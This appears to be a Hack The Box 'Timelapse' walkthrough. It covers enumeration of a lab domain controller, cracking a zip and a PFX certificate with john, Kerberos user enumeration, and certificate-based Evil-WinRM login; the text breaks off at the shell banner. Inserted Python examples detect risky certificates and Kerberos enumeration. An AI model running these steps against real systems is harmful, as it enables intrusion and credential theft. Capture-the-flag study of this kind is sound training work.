This is a Windows machine from Hack The Box.
Nmap scan
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Nmap scan report for 10.10.11.152
Host is up (0.35s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2023-09-14T20:19:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.74 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Low-hanging fruit: port 445 is open and this is a domain controller.
└─$ crackmapexec smb 10.10.11.152 -u "" -p ""
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/HTB/timelapse]
The domain is timelapse.htb.
I add it to /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
Using ldapsearch anonymously we get the naming contexts but nothing else, since a bind is required:
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=timelapse,DC=htb
namingcontexts: CN=Configuration,DC=timelapse,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingcontexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingcontexts: DC=ForestDnsZones,DC=timelapse,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=timelapse,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
kali@kali ~/H/timelapse [1]>
Trying anonymous rpcclient:
kali@kali ~/H/timelapse> rpcclient 10.10.11.152 -U ''
Password for [WORKGROUP\]:
rpcclient $> ls
command not found: ls
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $>
Tried GetNPUsers.py unauthenticated. No luck:
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
kali@kali /u/s/d/p/examples>
Listing shares anonymously with smbclient:
kali@kali /u/s/d/p/examples> smbclient -L //10.10.11.152
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali /u/s/d/p/examples>
There is a share called Shares. We try to access it anonymously:
kali@kali /u/s/d/p/examples> smbclient //10.10.11.152/shares -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali /u/s/d/p/examples [1]>
Tried enum4linux:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 14 08:45:06 2023
=========================================( Target Information )=========================================
Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.11.152 )===================================
[+] Server 10.10.11.152 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.11.152 )================================
Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.11.152 )=================================
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.152
enum4linux complete on Thu Sep 14 08:45:31 2023
kali@kali /u/s/d/p/examples>
Connecting to the Shares share anonymously:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1295497 blocks available
smb: \> cd dev
smb: \dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1294828 blocks available
smb: \dev\> get winrm_backup.zip
getting file \dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \dev\> cd ../
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1293430 blocks available
smb: \> cd Helpdesk
smb: \Helpdesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 1292493 blocks available
smb: \Helpdesk\> get *.*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \Helpdesk\*.*
smb: \Helpdesk\> get LAPS.x64.msi
parallel_read returned NT_STATUS_IO_TIMEOUT
^C
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 1287503 blocks available
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (25.5 KiloBytes/sec) (average 25.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (215.3 KiloBytes/sec) (average 105.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (36.6 KiloBytes/sec) (average 90.4 KiloBytes/sec)
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (323.6 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \HelpDesk\>
We download all the files locally.
We will first check the docs. ChatGPT says that to read the docs we need to install libreoffice-writer:
sudo apt update
sudo apt install libreoffice-writer
Once installed: libreoffice --writer LAPS_Datasheet.docx
After installing:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ dpkg -l | grep libreoffice-writer
ii libreoffice-writer 4:7.5.5-4 amd64 office productivity suite -- word processor
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
We find that the document was prepared by a "Jiri Formacek", but this is a Microsoft employee. We'll get back to this document later.
Cannot open the zip file; it seems to be password protected:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
I am going to check whether users called dev and helpdesk exist:
└─$ cat users.txt
dev
helpdesk
administrator
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Using kerbrute, they don't exist (only administrator comes back as valid):
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d timelapse.HTB users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop
2023/09/14 09:14:04 > Using KDC(s):
2023/09/14 09:14:04 > 10.10.11.152:88
2023/09/14 09:14:04 > [+] VALID USERNAME: administrator@timelapse.HTB
2023/09/14 09:14:04 > Done! Tested 3 usernames (1 valid) in 0.412 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Asked ChatGPT how to read the MSI:
sudo apt install msitools
msiextract LAPS.x64.msi outdir/
Ran the above:
└─$ msiextract LAPS.x64.msi outdir/
PolicyDefinitions/en-US/AdmPwd.adml
PolicyDefinitions/AdmPwd.admx
LAPS/AdmPwd.UI.exe
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.Utils.dll
LAPS/AdmPwd.Utils.dll
LAPS/CSE/AdmPwd.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.psd1
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.format.ps1xml
WindowsPowershell/v1.0/Modules/AdmPwd.PS/en-US/AdmPwd.PS.dll-Help.xml
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.zip
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd LAPS
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe AdmPwd.Utils.dll CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ ls
AdmPwd.dll
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ cd ../
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe AdmPwd.Utils.dll CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd ../
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.zip
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$
I am a bit stuck, so I will go back to the zip file and see if we can brute-force it with john, following these steps from ChatGPT:
zip2john winrm_backup.zip > winrm_backup.hash
john winrm_backup.hash
john --show winrm_backup.hash
Found the password: supremelegacy
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.hash
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt winrm_backup.zip
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2023-09-14 09:50) 1.923g/s 6679Kp/s 6679Kc/s 6679KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Unzipping the file:
inflating: legacyy_dev_auth.pfx
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx legacyy_dev_auth.pfx WindowsPowershell
cascade.nmap LAPS LAPS_TechnicalSpecification.docx PolicyDefinitions winrm_backup.hash
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi users.txt winrm_backup.zip
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat legacyy_dev_auth.pfx
Found the file legacyy_dev_auth.pfx. From ChatGPT:
The `.pfx` file is a PKCS#12 archive, which usually contains both a private key and its corresponding X.509 digital certificate. You can use `openssl` to manage and read these files.
To extract the private key from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
To extract the certificate from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
We try the above, but the zip password does not work for the PFX:
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
We are going to try and brute-force the password.
ChatGPT suggests we use pfx2john.py, which we install via:
git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRipper/src
./configure && make
Then we run the command inside the run folder to brute-force:
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ ./pfx2john.py ~/HTB/timelapse/legacyy_dev_auth.pfx > pfx.hash
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:02:58 DONE (2023-09-14 10:09) 0.005616g/s 18148p/s 18148c/s 18148C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$
The password is thuglegacy.
We run the two commands again:
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -out legacyy_dev_auth.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS.x64.msi privatekey.pem winrm_backup.zip
cascade.nmap LAPS legacyy_dev_auth.pem temp.pem
cascade.xml LAPS_Datasheet.docx legacyy_dev_auth.pfx users.txt
certificate.crt LAPS_OperationsGuide.docx pfx.hash WindowsPowershell
JohnTheRipper LAPS_TechnicalSpecification.docx PolicyDefinitions winrm_backup.hash
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat certificate.crt
Bag Attributes
localKeyID: 01 00 00 00
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat privatekey.pem
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Viewing the cert, again on ChatGPT's advice: openssl x509 -in certificate.crt -text -noout
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl x509 -in certificate.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = Legacyy
Validity
Not Before: Oct 25 14:05:52 2021 GMT
Not After : Oct 25 14:15:52 2031 GMT
Subject: CN = Legacyy
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Subject Alternative Name:
othername: UPN::legacyy@timelapse.htb
X509v3 Subject Key Identifier:
CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
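Reading the SAN by eye is fine for one certificate. As an added example (not part of the write-up), here is a small parser for the `openssl x509 -text` output above that reports what a defender should care about in a leaked client-auth certificate. The sample text is the certificate above with the hex blobs dropped, and the UPN is written out as the account the write-up goes on to use (legacyy@timelapse.htb).

```python
"""Parse `openssl x509 -text -noout` output and flag what makes a leaked
certificate dangerous. Added example, not part of the write-up."""
import re
from datetime import datetime, timezone

# Constructed sample: the certificate shown above, hex blobs omitted.
# The UPN is written out as the account the write-up goes on to use.
SAMPLE_X509_TEXT = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Legacyy
        Validity
            Not Before: Oct 25 14:05:52 2021 GMT
            Not After : Oct 25 14:15:52 2031 GMT
        Subject: CN = Legacyy
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Client Authentication
            X509v3 Subject Alternative Name:
                othername: UPN::legacyy@timelapse.htb
            X509v3 Subject Key Identifier:
                CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
"""

CLIENT_AUTH = "TLS Web Client Authentication"


def _field(text, label):
    """Value of a `Label: value` line; tolerates the `Not After :` spacing."""
    m = re.search(rf"^[ \t]*{re.escape(label)}[ \t]*:[ \t]*(.+?)[ \t]*$", text, re.M)
    if m is None:
        raise ValueError(f"field not found: {label}")
    return m.group(1)


def _section(text, header):
    """Lines indented below an extension header such as `X509v3 Extended Key Usage:`."""
    m = re.search(rf"^([ \t]*){re.escape(header)}.*\n((?:\1[ \t]+\S.*\n)*)", text, re.M)
    return [line.strip() for line in m.group(2).splitlines()] if m else []


def parse_x509_text(text):
    subject, issuer = _field(text, "Subject"), _field(text, "Issuer")
    fmt = "%b %d %H:%M:%S %Y %Z"
    eku = [u.strip() for line in _section(text, "X509v3 Extended Key Usage:")
           for u in line.split(",")]
    san = "\n".join(_section(text, "X509v3 Subject Alternative Name:"))
    return {
        "subject": subject,
        "issuer": issuer,
        "self_signed": subject == issuer,
        "not_before": datetime.strptime(_field(text, "Not Before"), fmt),
        "not_after": datetime.strptime(_field(text, "Not After"), fmt),
        "eku": eku,
        "upns": re.findall(r"UPN::(\S+)", san),
        "dns_names": re.findall(r"DNS:([^,\s]+)", san),
    }


def assess(cert, now=None, max_years=2):
    """Return human-readable findings; an empty list means nothing notable.
    `now` may be a datetime or an ISO date string (defaults to the current UTC time)."""
    if isinstance(now, str):
        now = datetime.fromisoformat(now)
    now = now or datetime.now(timezone.utc).replace(tzinfo=None)
    findings = []
    if CLIENT_AUTH in cert["eku"] and cert["upns"]:
        findings.append("client-auth certificate bound to " + ", ".join(cert["upns"])
                        + ": a copy of the PFX is a credential for that account")
    if cert["self_signed"]:
        findings.append("self-signed: nothing to revoke at a CA, trust must be removed on the host")
    years = (cert["not_after"] - cert["not_before"]).days // 365
    if years > max_years:
        findings.append(f"valid for {years} years, well past a sane rotation interval")
    if not cert["not_before"] <= now <= cert["not_after"]:
        findings.append("outside its validity window")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_x509_text(SAMPLE_X509_TEXT)):
        print("-", finding)
```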
I see a user legacyy@timelapse.htb.
I add it to users.txt and use kerbrute to see if it's valid, and it is:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nano users.txt
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d timelapse.HTB users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop
2023/09/14 10:20:03 > Using KDC(s):
2023/09/14 10:20:03 > 10.10.11.152:88
2023/09/14 10:20:03 > [+] VALID USERNAME: administrator@timelapse.HTB
2023/09/14 10:20:03 > [+] VALID USERNAME: legacyy@timelapse.HTB
2023/09/14 10:20:03 > Done! Tested 4 usernames (2 valid) in 0.349 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
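Both kerbrute runs above work because an AS-REQ for a name that does not exist makes the KDC answer KDC_ERR_C_PRINCIPAL_UNKNOWN. As an added example (not part of the write-up), here is the matching detection a defender would run on the DC side, over constructed Security event 4768 records; it assumes "Audit Kerberos Authentication Service" failure auditing is enabled so that those answers are logged with Status 0x6.

```python
"""Spot Kerberos username enumeration in Security event 4768 records.
Added example, not part of the write-up."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not a capture from the box: one 4768 per AS-REQ,
# rendered as "timestamp key=value ..." the way a log forwarder might emit it.
# Status 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN (no such account),
#        0x19 = KDC_ERR_PREAUTH_REQUIRED   (account exists, pre-auth needed),
#        0x0  = TGT issued.
SAMPLE_4768 = """\
2023-09-14T09:14:04 EventID=4768 TargetUserName=dev IpAddress=10.10.14.5 Status=0x6
2023-09-14T09:14:04 EventID=4768 TargetUserName=helpdesk IpAddress=10.10.14.5 Status=0x6
2023-09-14T09:14:04 EventID=4768 TargetUserName=administrator IpAddress=10.10.14.5 Status=0x19
2023-09-14T09:14:05 EventID=4768 TargetUserName=sales IpAddress=10.10.14.5 Status=0x6
2023-09-14T09:14:05 EventID=4768 TargetUserName=backup IpAddress=10.10.14.5 Status=0x6
2023-09-14T09:30:00 EventID=4768 TargetUserName=legacyy IpAddress=10.10.11.30 Status=0x0
2023-09-14T09:31:12 EventID=4768 TargetUserName=jdoe IpAddress=10.10.11.31 Status=0x6
2023-09-14T10:02:40 EventID=4768 TargetUserName=jodoe IpAddress=10.10.11.31 Status=0x6
"""

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6


def parse_4768(text):
    """Turn the key=value lines into dicts; lines that are not 4768 are ignored."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields if "=" in f)
        if kv.get("EventID") != "4768":
            continue
        events.append({
            "time": datetime.fromisoformat(stamp),
            "user": kv["TargetUserName"].lower(),
            "ip": kv["IpAddress"],
            "status": int(kv["Status"], 16),
        })
    return events


def detect_user_enum(events, window=timedelta(seconds=60), threshold=3):
    """Map source IP -> sorted unknown names for every source that asked for
    at least `threshold` distinct non-existent principals inside any `window`.
    A typo is one or two names spread over time; a wordlist is many in seconds."""
    unknown_by_ip = defaultdict(list)
    for ev in events:
        if ev["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown_by_ip[ev["ip"]].append(ev)

    hits = {}
    for ip, evs in unknown_by_ip.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            names = {e["user"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(names) >= threshold:
                hits[ip] = sorted(names)
                break
    return hits


if __name__ == "__main__":
    for ip, names in detect_user_enum(parse_4768(SAMPLE_4768)).items():
        print(f"{ip}: {len(names)} unknown principals in one window: {', '.join(names)}")
```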
We try GetNPUsers.py but have no luck getting a hash, as pre-authentication is required:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py timelapse.HTB/legacyy
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate legacyy, getting its TGT
[-] User legacyy doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
ChatGPT suggests that we can use the cert and the PEM key to authenticate. Interesting:
evil-winrm -i [TARGET_IP] -u [USERNAME] -c /path/to/certificate.crt -k /path/to/privatekey.pem
Tried the command, but it failed:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:72:in `validate_required_fields': password is a required option (RuntimeError)
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:59:in `validate'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:31:in `create_with_defaults'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:64:in `configure_connection_opts'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:27:in `initialize'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `new'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `connection_initialization'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:496:in `main'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:1029:in `<top (required)>'
from /usr/bin/evil-winrm:25:in `load'
from /usr/bin/evil-winrm:25:in `<main>'
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -p "dummy" -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
